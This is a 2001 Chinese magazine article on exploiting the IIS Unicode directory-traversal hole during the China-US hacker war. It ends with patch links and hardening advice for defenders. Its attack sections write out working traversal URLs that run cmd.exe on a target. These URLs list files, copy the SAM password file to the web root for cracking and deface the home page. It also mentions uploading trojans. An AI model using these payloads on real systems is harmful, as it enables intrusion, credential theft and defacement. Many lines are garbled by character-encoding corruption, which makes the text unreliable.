中美黑客大战攻击手法分析──Unicode漏洞攻击

Author: 小淘 Date: 2001年 22期

?牐牻衲?5月1日至5月7日的中美黑客大战，想必已给各位留下了深刻的印象，从双方黑客公布的攻击结果来看，多数主机都是 Windows NT和Windows2000系统，这两个系统目前被利用最多的漏洞是IIS的Unicode目录遍历漏洞，据测试报告表明，目前中国有1/5的主机存在该漏洞。
　　#1?牐犚弧? Unicode漏洞检测：
　　?牐燯nicode漏洞编码在中文Windows NT中为：%c1%1c（代表（0xc1- 0xc0）*0x40 + 0x1c=0x5c=＇/＇）和%c0%2f（代表（0xc0-0xc0）*0x40+0x2f =0x2f=＇\＇）。
　　?牐犜谟⑽陌嬷形?%c0%af（但%c1%pc、%c0%9v、%c0%qf、%c1%8s等几个编码也可能有效）。
　　?牐犕ü饧父霰嗦胛颐强梢酝ü阡榔魃匣竦糜蠻nicode漏洞的机器文件控制权。
　　?牐牸虻ゼ觳獍旆ㄊ窃阡榔骼锩媸淙耄篽ttp://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe？/c+dir，如果显示：
　　?牐燚irectory of D:\Inetpub\scripts
　　?牐?01-05-02   02:32a  <DIR> .
　　?牐?01-05-02   02:32a  <DIR> ..
　　?牐?00-12-18   05:50p  <DIR>
　　?牐爏amples
　　?牐牎?
　　?牐犓得魍敬嬖诟寐┒矗绻幌允靖靡趁妫部赡苁且蛭猄cripts目录改名了，我们可以试着输入：
　　?牐爃ttp://xxx.xxx.xxx.xxx/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe？/c+dir，如果显示像上面一样的目录，表明存在漏洞。（例子中xxx.xxx.xxx.xxx为服务器的IP地址，如何获得这里不多说了）
　　?牐犎绻故鞘鞠允靖靡趁妫捎蒙鲜銎渌肴纾?%c0%af代替%c1%1c试一试，或者你可以使用一段perl程序检测该漏洞（关于Perl程序这里不作讨论）。
　　#1    二、 Unicode漏洞攻击
　　?牐犕ü齍nicode漏洞可以使攻击者在浏览器执行DOS命令，如：
　　?牐爃ttp://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe？/c+dir+c??
　　?牐犝馓趺罱狗衿髁谐鯟盘所有目录文件。
　　?牐爃ttp://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe？+ copy+c:\winnt\repair｜sam._+c:\inetpub\wwwroot\
　　?牐牻狗衿髦葱幸桓龈粗艭盘WinNT目录下的sam._到wwwroot文件夹的命令（sam._保存了经过加密的Windows NT系统密码文件，如果攻击者下载了这一文件，可以在本机用工具解得用户密码）。
　　?牐犂肊cho命令即可通过浏览器直接更改网站的主页，如想修改c:\inetpub\wwwroot\index.asp，攻击者可以通过在浏览器的地址栏输入：
　　?牐爃ttp://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe？/c+echo+Your+Site+Has+Been+Hacked+ >c:\inetpub\wwwroot\index.aps
　　?牐牴セ髡呋箍梢岳肍TP、TFTP上载木马程序及提升管理权限的程序到被攻击服务器上，也可以通过建立BAT或者ASP文件直接获得系统权限，从而控制整个系统。
　　#1?牐犎⑷绾畏婪禪nicode编码攻击
　　?牐燯nicode编码漏洞最好的修补的方式是下载安装微软提供的补丁，下载地址是：
　　?牐營IS4.0补丁：http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp
　　?牐營IS5.0补丁：http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp
　　?牐犇憧梢酝ü榭磜innt\system32\logfiles下的W3SVC1目录的log文件，确定是否有人利用Unicode编码漏洞攻击你的主机攻击（根据设置不同也可能在是W3SVC2或者W3SVC3目录下）。
　　?牐燯nicode编码漏洞给网络安全管理员配置系统的几个启示，首先在安装Windwos NT系统的时候，不要按照系统的默认目录把Windwos 安装在WinNT目录下面，把WinNT目录改名将使攻击者难于猜测命令执行目录；其次，应该把/WinNT/System32目录底下的cmd.exe和net.exe改名或者移除，这样攻击者就无法找到执行命令的文件；再者，应该把WEB服务器所有默认安装的执行目录删除，包括Samples、Scripts及Cgi-bin，这些目录如果被上传可执行文件，即可能对系统造成重大威胁，如果需要可执行目录，则自己可新建一个不与默认执行目录同名的目录；最后，网络管理员应该把系统日记文件目录移到一个更隐蔽的地方，这样攻击者就不易找到系统记录文件加以清除了。